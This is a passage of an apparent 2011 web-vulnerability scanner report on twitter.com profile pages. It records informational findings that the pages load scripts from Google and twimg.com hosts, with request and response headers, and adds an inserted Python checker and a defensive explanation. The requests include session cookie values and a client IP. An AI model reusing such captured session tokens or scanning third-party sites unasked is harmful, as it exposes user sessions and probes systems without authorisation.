18.401. http://twitter.com/benmezrich

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /benmezrich

Issue detail

The response dynamically includes scripts from the following other domains (see the <script src> elements in the response body below): ajax.googleapis.com, a0-a3.twimg.com, www.google.com.

Request

GET /benmezrich HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265970-66900-52833
ETag: "c5b0a06ada9d5c4864087cf3c0c522b7"
Last-Modified: Sat, 29 Jan 2011 01:52:50 GMT
X-Runtime: 0.01562
Content-Type: text/html; charset=utf-8
Content-Length: 50003
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836" type="text/javascript"></script>
...[SNIP]...

18.402. http://twitter.com/bennadel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /bennadel

Issue detail

The response dynamically includes scripts from other domains; the script elements concerned are visible in the response body below.

Request

GET /bennadel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225029-56076-61608
ETag: "241ca6186e49f64c12f595a689635dc8"
Last-Modified: Fri, 28 Jan 2011 14:30:29 GMT
X-Runtime: 0.64571
Content-Type: text/html; charset=utf-8
Content-Length: 49758
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiBodHRwOi8vdHdpdHRlci5jb20vYmVubmFkZWw6%250ADGNzcmZfaWQiJTEyNDM3NmU5Zjg3ODYwNmJiMWM2YjQ0MzhhNmM0NTM5Og9j%250AcmVhdGVkX2F0bCsIM07wzC0BOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRh%250AZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--d2adbee25df14d0172349a6c3fd5e58e45975083; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...
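The "cross-domain script include" findings on this page are all the same observation: the twitter.com profile pages pull JavaScript from hosts other than twitter.com (ajax.googleapis.com, www.google.com and the a0-a3.twimg.com CDN hosts). A script loaded that way runs in the including page's origin, with the same access to its DOM and cookies as twitter.com's own code, so the page is only as trustworthy as every host it loads script from. The check below is an added example, not code from the scanner or from Twitter: it reproduces the host-based test behind the finding on a response body constructed from the script tags visible in the responses above, plus a constructed same-origin script (`/javascripts/local_init.js`) and a constructed protocol-relative include (`//a0.twimg.com/...`) to show what is and is not flagged. Function and variable names are the example's own.

```python
"""Cross-domain script include check (added example, not scanner or site code)."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> start tag, in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())
                break


def cross_domain_scripts(page_host, html):
    """Return the script src URLs whose host differs from page_host.

    Relative URLs (no host) are same-origin and skipped. Absolute and
    protocol-relative (//host/...) URLs are compared by hostname, case-
    insensitively. Like the scanner's check this is purely host-based:
    www.twitter.com or a CDN owned by the same organisation still counts
    as another domain, because the browser trusts the host, not the owner.
    """
    collector = _ScriptSrcCollector()
    collector.feed(html)
    collector.close()
    page_host = page_host.lower()
    flagged = []
    for src in collector.srcs:
        host = urlsplit(src).hostname  # None for relative URLs
        if host is not None and host != page_host:
            flagged.append(src)
    return flagged


def scripts_by_host(page_host, html):
    """Group the cross-domain script URLs by the host they are loaded from."""
    grouped = {}
    for src in cross_domain_scripts(page_host, html):
        grouped.setdefault(urlsplit(src).hostname, []).append(src)
    return grouped


# Constructed sample: the script tags seen in the twitter.com responses on this
# page, plus a same-origin script and a protocol-relative include added for
# illustration. Inline script has no src and is never a cross-domain include.
SAMPLE_RESPONSE_BODY = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script src="/javascripts/local_init.js" type="text/javascript"></script>
<script type="text/javascript">var twttr = {};</script>
</head>
<body>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="//a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
</body>
</html>
"""


if __name__ == "__main__":
    # Prints a report in the same spirit as the finding: one line per foreign
    # host, followed by the script URLs loaded from it.
    for host, urls in scripts_by_host("twitter.com", SAMPLE_RESPONSE_BODY).items():
        print(host)
        for url in urls:
            print("    ", url)
```

Run against the body of any response on this page, the function returns the googleapis, google.com and twimg.com script URLs and nothing else, which is exactly the set the scanner is reporting. The finding is rated Information because nothing here is exploitable on its own; it records a trust dependency. The controls that later became available for this exact problem are a Content-Security-Policy `script-src` that names the permitted hosts and Subresource Integrity hashes on the script tags; neither existed when this 2011 report was generated.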

18.403. http://twitter.com/bennadel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /bennadel

Issue detail

The response dynamically includes scripts from other domains; the script elements concerned are visible in the response body below.

Request

GET /bennadel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234655-24204-44916
ETag: "5aae09f52cc65ab250f4b67cc7e38a81"
Last-Modified: Fri, 28 Jan 2011 17:10:55 GMT
X-Runtime: 0.00814
Content-Type: text/html; charset=utf-8
Content-Length: 49874
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.404. http://twitter.com/bennadel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /bennadel

Issue detail

The response dynamically includes scripts from other domains; the script elements concerned are visible in the response body below.

Request

GET /bennadel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225162-25295-16708
ETag: "d9efc82cb1206978f8253152c54f3965"
Last-Modified: Fri, 28 Jan 2011 14:32:42 GMT
X-Runtime: 0.56952
Content-Type: text/html; charset=utf-8
Content-Length: 49771
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiBodHRwOi8vdHdpdHRlci5jb20vYmVubmFkZWw6%250ADGNzcmZfaWQiJWJlMzg1YWQ0YjQzNzUzOTA0MTE2MTJhMjkxZjZjYmZmOgdp%250AZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE%253D--01db1049138c566b03ae42ff19e8991c9f58be62; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.405. http://twitter.com/bostonherald

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /bostonherald

Issue detail

The response dynamically includes scripts from other domains; the script elements concerned are visible in the response body below.

Request

GET /bostonherald HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265280-17400-32279
ETag: "e1a9ca3ce3850d33d8312521c7367bdc"
Last-Modified: Sat, 29 Jan 2011 01:41:20 GMT
X-Runtime: 0.00787
Content-Type: text/html; charset=utf-8
Content-Length: 38696
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.406. http://twitter.com/cjronson

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /cjronson

Issue detail

The response dynamically includes scripts from other domains; the script elements concerned are visible in the response body below.

Request

GET /cjronson HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266042-1314-53197
ETag: "57db21f7394d7e31ecaad1a1f749d095"
Last-Modified: Sat, 29 Jan 2011 01:54:02 GMT
X-Runtime: 0.01554
Content-Type: text/html; charset=utf-8
Content-Length: 51916
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836" type="text/javascript"></script>
...[SNIP]...

18.407. http://twitter.com/cowboy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /cowboy

Issue detail

The response dynamically includes scripts from other domains; the script elements concerned are visible in the response body below.

Request

GET /cowboy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-85333-1036
ETag: "257ca8de3359b561c58908e572d9840c"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01434
Content-Type: text/html; charset=utf-8
Content-Length: 52646
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

